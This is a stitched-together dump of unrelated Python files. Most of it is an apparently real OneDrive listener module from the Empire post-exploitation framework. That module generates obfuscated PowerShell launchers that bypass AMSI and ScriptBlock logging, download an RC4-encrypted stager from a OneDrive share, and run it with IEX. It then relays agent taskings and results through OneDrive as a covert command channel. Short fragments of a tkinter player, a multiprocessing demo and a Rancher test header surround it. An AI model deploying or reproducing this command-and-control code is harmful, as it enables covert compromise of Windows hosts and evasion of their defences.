g.prepared = sum(map(lambda x: 1 if x is not None and g.scaledSize() == (x.width(), x.height()) else 0, g.photoImages))
updateTitle()
def stream(label: tk.Canvas):
g.load(sys.argv[1])
while True:
while g.pause : sleep(0.001)
nextFrame()
sleepTime = (1 / g.fps - g.frameTimeCost) / g.speed
if sleepTime > 0: sleep(sleepTime)
# else: print('Warning: fps not full. frame %d time %.4f' % (g.cur, g.frameTimeCost))
def clickCallback(e):
g.fromPoint = g.viewPos()
g.mouseFromPoint = g.mousePos()
def moveCallback(e):
g.mouseToPoint = g.mousePos()
dir = (g.mouseToPoint[0] - g.mouseFromPoint[0], g.mouseToPoint[1] - g.mouseFromPoint[1])
targetPos = (g.fromPoint[0] + dir[0], g.fromPoint[1] + dir[1])
g.view.place(relx = targetPos[0] / g.windowSize()[0], rely = targetPos[1] / g.windowSize()[1], anchor = tk.CENTER)
if __name__ == "__main__":
root = tk.Tk()
root.config(width = 1280, height = 800)
label = tk.Label(root)
label.place(relx = 0.5, rely = 0.5, anchor = tk.CENTER)
thread = threading.Thread(target = stream, args = (label,))
    thread.daemon = True
thread.start()
g.tk = root
g.view = label
root.bind('<Key>', keyboardCallback)
root.bind("<MouseWheel>", scrollCallback)
root.bind("<Button-1>", clickCallback)
root.bind("<B1-Motion>", moveCallback)
root.mainloop()
|
multiprocess.py
|
import random
import multiprocessing as mp
def random_integer(output):
"""Generate a random integer in [0, 9]
Args:
output: multiprocessing queue
"""
integer = random.randint(0, 9)
output.put(integer)
def main():
output = mp.Queue()
processes = []
for _ in range(4):
processes.append(
# Create a process that wraps our function
mp.Process(target=random_integer, args=(output,))
)
for proc in processes:
proc.start()
for proc in processes:
proc.join()
results = [output.get() for proc in processes]
print(results)
if __name__=="__main__":
main()
|
onedrive.py
|
from __future__ import print_function
from builtins import str
from builtins import object
import base64
import random
import os
import re
import time
from datetime import datetime
import copy
import traceback
import sys
import json
from pydispatch import dispatcher
from requests import Request, Session
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import bypasses
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Onedrive',
'Author': ['@mr64bit'],
'Description': (
                'Starts an Onedrive listener. Setup instructions here: gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9'),
'Category': ('third_party'),
'Comments': ["Note that deleting STAGE0-PS.txt from the staging folder will break existing launchers"]
}
self.options = {
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'onedrive'
},
'ClientID': {
'Description': 'Application ID of the OAuth App.',
'Required': True,
'Value': ''
},
'ClientSecret': {
'Description': 'Client secret of the OAuth App.',
'Required': True,
'Value': ''
},
'AuthCode': {
'Description': 'Auth code given after authenticating OAuth App.',
'Required': True,
'Value': ''
},
'BaseFolder': {
'Description': 'The base Onedrive folder to use for comms.',
'Required': True,
'Value': 'empire'
},
'StagingFolder': {
'Description': 'The nested Onedrive staging folder.',
'Required': True,
'Value': 'staging'
},
'TaskingsFolder': {
'Description': 'The nested Onedrive taskings folder.',
'Required': True,
'Value': 'taskings'
},
'ResultsFolder': {
'Description': 'The nested Onedrive results folder.',
'Required': True,
'Value': 'results'
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
                'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': 'asdf'
},
'PollInterval': {
'Description': 'Polling interval (in seconds) to communicate with Onedrive.',
'Required': True,
'Value': '5'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 10
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 10
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "N/A|Microsoft SkyDriveSync 17.005.0107.0008 ship; Windows NT 10.0 (16299)"
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RefreshToken': {
'Description': 'Refresh token used to refresh the auth token',
'Required': False,
'Value': ''
},
'RedirectURI': {
'Description': 'Redirect URI of the registered application',
'Required': True,
'Value': "https://login.live.com/oauth20_desktop.srf"
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
self.mainMenu = mainMenu
self.threads = {}
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
return ''
def validate_options(self):
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# If we don't have an OAuth code yet, give the user a URL to get it
if (str(self.options['RefreshToken']['Value']).strip() == '') and (
str(self.options['AuthCode']['Value']).strip() == ''):
if (str(self.options['ClientID']['Value']).strip() == ''):
print(helpers.color("[!] ClientID needed to generate AuthCode URL!"))
return False
params = {'client_id': str(self.options['ClientID']['Value']).strip(),
'response_type': 'code',
'redirect_uri': self.options['RedirectURI']['Value'],
'scope': 'files.readwrite offline_access'}
req = Request('GET', 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize', params=params)
prep = req.prepare()
print(helpers.color("[*] Get your AuthCode from \"%s\" and try starting the listener again." % prep.url))
return False
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
if not language:
print(helpers.color("[!] listeners/onedrive generate_launcher(): No language specified"))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
listener_options = self.mainMenu.listeners.activeListeners[listenerName]['options']
staging_key = listener_options['StagingKey']['Value']
profile = listener_options['DefaultProfile']['Value']
launcher_cmd = listener_options['Launcher']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
base_folder = listener_options['BaseFolder']['Value'].strip("/")
staging_folder = listener_options['StagingFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if language.startswith("power"):
launcher = "$ErrorActionPreference = 'SilentlyContinue';" # Set as empty string for debugging
if safeChecks.lower() == 'true':
launcher = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
launcher += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
launcher += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
launcher += bypasses.AMSIBypass2()
launcher += "};"
launcher += helpers.randomize_capitalization(
"[System.Net.ServicePointManager]::Expect100Continue=0;")
launcher += helpers.randomize_capitalization("$wc=New-Object SYstem.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listener_options['DefaultProfile']['Value']
userAgent = profile.split("|")[1]
launcher += "$u='" + userAgent + "';"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
launcher += helpers.randomize_capitalization("$wc.Headers.Add(")
launcher += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
launcher += helpers.randomize_capitalization(
"$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
launcher += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
launcher += helpers.randomize_capitalization("$proxy.Address = '" + proxy.lower() + "';")
launcher += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
launcher += helpers.randomize_capitalization(
"$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
username = proxyCreds.split(":")[0]
password = proxyCreds.split(":")[1]
domain = username.split("\\")[0]
usr = username.split("\\")[1]
launcher += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
launcher += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
launcher += "$Script:Proxy = $wc.Proxy;"
# code to turn the key string into a byte array
launcher += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
launcher += ("'%s');" % staging_key)
# this is the minimized RC4 launcher code from rc4.ps1
launcher += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
launcher += helpers.randomize_capitalization("$data=$wc.DownloadData('")
launcher += self.mainMenu.listeners.activeListeners[listenerName]['stager_url']
launcher += helpers.randomize_capitalization("');$iv=$data[0..3];$data=$data[4..$data.length];")
launcher += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
launcher = helpers.obfuscate(self.mainMenu.installPath, launcher,
obfuscationCommand=obfuscationCommand)
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(launcher, launcher_cmd)
else:
return launcher
if language.startswith("pyth"):
print(helpers.color("[!] listeners/onedrive generate_launcher(): Python agent not implimented yet"))
return "python not implimented yet"
else:
print(helpers.color("[!] listeners/onedrive generate_launcher(): invalid listener name"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, language=None, token=None):
"""
Generate the stager code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_stager(): no language specified"))
return None
staging_key = listenerOptions['StagingKey']['Value']
base_folder = listenerOptions['BaseFolder']['Value']
staging_folder = listenerOptions['StagingFolder']['Value']
working_hours = listenerOptions['WorkingHours']['Value']
profile = listenerOptions['DefaultProfile']['Value']
agent_delay = listenerOptions['DefaultDelay']['Value']
if language.lower() == 'powershell':
f = open("%s/data/agent/stagers/onedrive.ps1" % self.mainMenu.installPath)
stager = f.read()
f.close()
stager = stager.replace("REPLACE_STAGING_FOLDER", "%s/%s" % (base_folder, staging_folder))
stager = stager.replace('REPLACE_STAGING_KEY', staging_key)
stager = stager.replace("REPLACE_TOKEN", token)
stager = stager.replace("REPLACE_POLLING_INTERVAL", str(agent_delay))
if working_hours != "":
stager = stager.replace("REPLACE_WORKING_HOURS", working_hours)
randomized_stager = ''
for line in stager.split("\n"):
line = line.strip()
if not line.startswith("#"):
if "\"" not in line:
randomized_stager += helpers.randomize_capitalization(line)
else:
randomized_stager += line
if encode:
return helpers.enc_powershell(randomized_stager)
elif encrypt:
RC4IV = os.urandom(4)
staging_key = staging_key.encode('UTF-8')
return RC4IV + encryption.rc4(RC4IV + staging_key, randomized_stager.encode('UTF-8'))
else:
return randomized_stager
else:
print(helpers.color("[!] Python agent not available for Onedrive"))
def generate_comms(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
staging_key = listener_options['StagingKey']['Value']
base_folder = listener_options['BaseFolder']['Value']
taskings_folder = listener_options['TaskingsFolder']['Value']
results_folder = listener_options['ResultsFolder']['Value']
if not language:
print(helpers.color("[!] listeners/onedrive generate_comms(): No language specified"))
return
if language.lower() == "powershell":
# Function to generate a WebClient object with the required headers
token_manager = """
$Script:TokenObject = @{token="%s";refresh="%s";expires=(Get-Date).addSeconds(3480)};
$script:GetWebClient = {
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
}
if((Get-Date) -gt $Script:TokenObject.expires) {
$data = New-Object System.Collections.Specialized.NameValueCollection
$data.add("client_id", "%s")
$data.add("client_secret", "%s")
$data.add("grant_type", "refresh_token")
$data.add("scope", "files.readwrite offline_access")
$data.add("refresh_token", $Script:TokenObject.refresh)
$data.add("redirect_uri", "%s")
$bytes = $wc.UploadValues("https://login.microsoftonline.com/common/oauth2/v2.0/token", "POST", $data)
$response = [system.text.encoding]::ascii.getstring($bytes)
$Script:TokenObject.token = [regex]::match($response, '"access_token":"(.+?)"').groups[1].value
$Script:TokenObject.refresh = [regex]::match($response, '"refresh_token":"(.+?)"').groups[1].value
$expires_in = [int][regex]::match($response, '"expires_in":([0-9]+)').groups[1].value
$Script:TokenObject.expires = (get-date).addSeconds($expires_in - 15)
}
$wc.headers.add("User-Agent", $script:UserAgent)
$wc.headers.add("Authorization", "Bearer $($Script:TokenObject.token)")
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
$wc
}
""" % (token, refresh_token, client_id, client_secret, redirect_uri)
post_message = """
$script:SendMessage = {
param($packets)
if($packets) {
$encBytes = encrypt-bytes $packets
$RoutingPacket = New-RoutingPacket -encData $encBytes -Meta 5
} else {
$RoutingPacket = ""
}
$wc = (& $GetWebClient)
$resultsFolder = "%s"
try {
try {
$data = $null
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content")
} catch {}
if($data -and $data.length -ne 0) {
$routingPacket = $data + $routingPacket
}
$wc = (& $GetWebClient)
$null = $wc.UploadData("https://graph.microsoft.com/v1.0/drive/root:/$resultsFolder/$($script:SessionID).txt:/content", "PUT", $RoutingPacket)
                $script:missedCheckins = 0
$script:lastseen = get-date
}
catch {
if($_ -match "Unable to connect") {
$script:missedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, results_folder))
get_message = """
$script:lastseen = Get-Date
$script:GetTask = {
try {
$wc = (& $GetWebClient)
$TaskingsFolder = "%s"
#If we haven't sent a message recently...
if($script:lastseen.addseconds($script:AgentDelay * 2) -lt (get-date)) {
(& $SendMessage -packets "")
}
$script:MissedCheckins = 0
$data = $wc.DownloadData("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt:/content")
if($data -and ($data.length -ne 0)) {
$wc = (& $GetWebClient)
$null = $wc.UploadString("https://graph.microsoft.com/v1.0/drive/root:/$TaskingsFolder/$($script:SessionID).txt", "DELETE", "")
if([system.text.encoding]::utf8.getString($data) -eq "RESTAGE") {
Start-Negotiate -T $script:TokenObject.token -SK $SK -PI $PI -UA $UA
}
$Data
}
}
catch {
if($_ -match "Unable to connect") {
$script:MissedCheckins += 1
}
}
}
""" % ("%s/%s" % (base_folder, taskings_folder))
return token_manager + post_message + get_message
def generate_agent(self, listener_options, client_id, client_secret, token, refresh_token, redirect_uri,
language=None):
"""
Generate the agent code
"""
if not language:
print(helpers.color("[!] listeners/onedrive generate_agent(): No language specified"))
return
language = language.lower()
delay = listener_options['DefaultDelay']['Value']
jitter = listener_options['DefaultJitter']['Value']
profile = listener_options['DefaultProfile']['Value']
lost_limit = listener_options['DefaultLostLimit']['Value']
working_hours = listener_options['WorkingHours']['Value']
kill_date = listener_options['KillDate']['Value']
b64_default_response = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
agent_code = f.read()
f.close()
comms_code = self.generate_comms(listener_options, client_id, client_secret, token, refresh_token,
redirect_uri, language)
agent_code = agent_code.replace("REPLACE_COMMS", comms_code)
agent_code = helpers.strip_powershell_comments(agent_code)
agent_code = agent_code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
agent_code = agent_code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
agent_code = agent_code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
agent_code = agent_code.replace('$LostLimit = 60', "$LostLimit = " + str(lost_limit))
agent_code = agent_code.replace('$DefaultResponse = ""',
'$DefaultResponse = "' + b64_default_response.decode('UTF-8') + '"')
if kill_date != "":
agent_code = agent_code.replace("$KillDate,", "$KillDate = '" + str(kill_date) + "',")
return agent_code
def start_server(self, listenerOptions):
# Utility functions to handle auth tasks and initial setup
def get_token(client_id, client_secret, code):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'authorization_code',
'scope': 'files.readwrite offline_access',
'code': code,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
                r_token['expires_at'] = time.time() + int(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def renew_token(client_id, client_secret, refresh_token):
params = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': 'refresh_token',
'scope': 'files.readwrite offline_access',
'refresh_token': refresh_token,
'redirect_uri': redirect_uri}
try:
r = s.post('https://login.microsoftonline.com/common/oauth2/v2.0/token', data=params)
r_token = r.json()
                r_token['expires_at'] = time.time() + int(r_token['expires_in']) - 15
r_token['update'] = True
return r_token
except KeyError as e:
print(helpers.color("[!] Something went wrong, HTTP response %d, error code %s: %s" % (
r.status_code, r.json()['error_codes'], r.json()['error_description'])))
raise
def test_token(token):
headers = s.headers.copy()
headers['Authorization'] = 'Bearer ' + token
request = s.get("%s/drive" % base_url, headers=headers)
return request.ok
def setup_folders():
if not (test_token(token['access_token'])):
raise ValueError("Could not set up folders, access token invalid")
base_object = s.get("%s/drive/root:/%s" % (base_url, base_folder))
if not (base_object.status_code == 200):
print(helpers.color("[*] Creating %s folder" % base_folder))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': base_folder}
base_object = s.post("%s/drive/items/root/children" % base_url, json=params)
else:
message = "[*] {} folder already exists".format(base_folder)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
for item in [staging_folder, taskings_folder, results_folder]:
item_object = s.get("%s/drive/root:/%s/%s" % (base_url, base_folder, item))
if not (item_object.status_code == 200):
print(helpers.color("[*] Creating %s/%s folder" % (base_folder, item)))
params = {'@microsoft.graph.conflictBehavior': 'rename', 'folder': {}, 'name': item}
item_object = s.post("%s/drive/items/%s/children" % (base_url, base_object.json()['id']),
json=params)
else:
message = "[*] {}/{} already exists".format(base_folder, item)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
def upload_launcher():
ps_launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=False,
userAgent='none', proxy='none', proxyCreds='none')
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "LAUNCHER-PS.TXT"),
data=ps_launcher, headers={"Content-Type": "text/plain"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
launcher_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
def upload_stager():
ps_stager = self.generate_stager(listenerOptions=listener_options, language='powershell',
token=token['access_token'])
r = s.put("%s/drive/root:/%s/%s/%s:/content" % (base_url, base_folder, staging_folder, "STAGE0-PS.txt"),
data=ps_stager, headers={"Content-Type": "application/octet-stream"})
if r.status_code == 201 or r.status_code == 200:
item = r.json()
r = s.post("%s/drive/items/%s/createLink" % (base_url, item['id']),
json={"scope": "anonymous", "type": "view"},
headers={"Content-Type": "application/json"})
stager_url = "https://api.onedrive.com/v1.0/shares/%s/driveitem/content" % r.json()['shareId']
# Different domain for some reason?
self.mainMenu.listeners.activeListeners[listener_name]['stager_url'] = stager_url
else:
print(helpers.color("[!] Something went wrong uploading stager"))
                message = r.content.decode('UTF-8', errors='replace')
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
listener_options = copy.deepcopy(listenerOptions)
listener_name = listener_options['Name']['Value']
staging_key = listener_options['StagingKey']['Value']
poll_interval = listener_options['PollInterval']['Value']
client_id = listener_options['ClientID']['Value']
client_secret = listener_options['ClientSecret']['Value']
auth_code = listener_options['AuthCode']['Value']
refresh_token = listener_options['RefreshToken']['Value']
base_folder = listener_options['BaseFolder']['Value']
staging_folder = listener_options['StagingFolder']['Value'].strip('/')
taskings_folder = listener_options['TaskingsFolder']['Value'].strip('/')
results_folder = listener_options['ResultsFolder']['Value'].strip('/')
redirect_uri = listener_options['RedirectURI']['Value']
base_url = "https://graph.microsoft.com/v1.0"
s = Session()
if refresh_token:
token = renew_token(client_id, client_secret, refresh_token)
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
else:
token = get_token(client_id, client_secret, auth_code)
message = "[*] Got new auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive")
s.headers['Authorization'] = "Bearer " + token['access_token']
setup_folders()
while True:
# Wait until Empire is aware the listener is running, so we can save our refresh token and stager URL
try:
if listener_name in list(self.mainMenu.listeners.activeListeners.keys()):
upload_stager()
upload_launcher()
break
else:
time.sleep(1)
except AttributeError:
time.sleep(1)
while True:
time.sleep(int(poll_interval))
try: # Wrap the whole loop in a try/catch so one error won't kill the listener
if time.time() > token['expires_at']: # Get a new token if the current one has expired
token = renew_token(client_id, client_secret, token['refresh_token'])
s.headers['Authorization'] = "Bearer " + token['access_token']
message = "[*] Refreshed auth token"
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
upload_stager()
if token['update']:
self.mainMenu.listeners.update_listener_options(listener_name, "RefreshToken",
token['refresh_token'])
token['update'] = False
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, staging_folder))
for item in search.json()['children']: # Iterate all items in the staging folder
try:
reg = re.search("^([A-Z0-9]+)_([0-9]).txt", item['name'])
if not reg:
continue
agent_name, stage = reg.groups()
if stage == '1': # Download stage 1, upload stage 2
message = "[*] Downloading {}/{}/{} {}".format(base_folder, staging_folder, item['name'],
item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
message = "[*] Uploading {}/{}/{}_2.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(return_val)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_2.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=return_val)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
if stage == '3': # Download stage 3, upload stage 4 (full agent code)
message = "[*] Downloading {}/{}/{}, {} bytes".format(base_folder, staging_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
content = s.get(item['@microsoft.graph.downloadUrl']).content
lang, return_val = \
self.mainMenu.agents.handle_agent_data(staging_key, content, listener_options)[0]
session_key = self.mainMenu.agents.agents[agent_name]['sessionKey']
agent_token = renew_token(client_id, client_secret, token[
'refresh_token']) # Get auth and refresh tokens for the agent to use
agent_code = str(self.generate_agent(listener_options, client_id, client_secret,
agent_token['access_token'],
agent_token['refresh_token'], redirect_uri, lang))
enc_code = encryption.aes_encrypt_then_hmac(session_key, agent_code)
message = "[*] Uploading {}/{}/{}_4.txt, {} bytes".format(base_folder, staging_folder,
agent_name, str(len(enc_code)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.put("%s/drive/root:/%s/%s/%s_4.txt:/content" % (
base_url, base_folder, staging_folder, agent_name), data=enc_code)
message = "[*] Deleting {}/{}/{}".format(base_folder, staging_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
print(helpers.color(
"[!] Could not handle agent staging for listener %s, continuing" % listener_name))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
agent_ids = self.mainMenu.agents.get_agents_for_listener(listener_name)
for agent_id in agent_ids: # Upload any tasks for the current agents
if isinstance(agent_id,bytes):
agent_id = agent_id.decode('UTF-8')
task_data = self.mainMenu.agents.handle_agent_request(agent_id, 'powershell', staging_key,
update_lastseen=True)
if task_data:
try:
r = s.get("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id))
if r.status_code == 200: # If there's already something there, download and append the new data
task_data = r.content + task_data
message = "[*] Uploading agent tasks for {}, {} bytes".format(agent_id, str(len(task_data)))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data=task_data)
except Exception as e:
message = "[!] Error uploading agent tasks for {}, {}".format(agent_id, e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
search = s.get("%s/drive/root:/%s/%s?expand=children" % (base_url, base_folder, results_folder))
for item in search.json()['children']: # For each file in the results folder
try:
agent_id = item['name'].split(".")[0]
                        # Normalize agent IDs to str once; calling .decode() on str objects would raise
                        agent_ids = [aid.decode('UTF-8') if isinstance(aid, bytes) else aid
                                     for aid in agent_ids]
if not agent_id in agent_ids: # If we don't recognize that agent, upload a message to restage
print(helpers.color(
"[*] Invalid agent, deleting %s/%s and restaging" % (results_folder, item['name'])))
s.put("%s/drive/root:/%s/%s/%s.txt:/content" % (
base_url, base_folder, taskings_folder, agent_id), data="RESTAGE")
s.delete("%s/drive/items/%s" % (base_url, item['id']))
continue
try: # Update the agent's last seen time, from the file timestamp
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%S.%fZ")
except: # sometimes no ms for some reason...
seen_time = datetime.strptime(item['lastModifiedDateTime'], "%Y-%m-%dT%H:%M:%SZ")
seen_time = helpers.utc_to_local(seen_time)
self.mainMenu.agents.update_agent_lastseen_db(agent_id, seen_time)
# If the agent is just checking in, the file will only be 1 byte, so no results to fetch
if (item['size'] > 1):
message = "[*] Downloading results from {}/{}, {} bytes".format(results_folder,
item['name'], item['size'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
r = s.get(item['@microsoft.graph.downloadUrl'])
self.mainMenu.agents.handle_agent_data(staging_key, r.content, listener_options,
update_lastseen=True)
message = "[*] Deleting {}/{}".format(results_folder, item['name'])
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.delete("%s/drive/items/%s" % (base_url, item['id']))
except Exception as e:
message = "[!] Error handling agent results for {}, {}".format(item['name'], e)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
except Exception as e:
print(helpers.color("[!] Something happened in listener %s: %s, continuing" % (listener_name, e)))
message = traceback.format_exc()
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/onedrive/{}".format(listener_name))
s.close()
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(3)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
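# File-naming protocol used by this listener (as implemented in start_server above):
#   <staging_folder>/<AGENTID>_1.txt  agent -> server   stage-1 negotiation blob
#   <staging_folder>/<AGENTID>_2.txt  server -> agent   stage-2 reply
#   <staging_folder>/<AGENTID>_3.txt  agent -> server   stage-3 blob
#   <staging_folder>/<AGENTID>_4.txt  server -> agent   AES-encrypted full agent code
#   <taskings_folder>/<AGENTID>.txt   server -> agent   queued taskings (appended if a file already exists)
#   <results_folder>/<AGENTID>.txt    agent -> server   results; a 1-byte file is treated as a plain check-in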
common.py
from ..common import * # NOQA
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
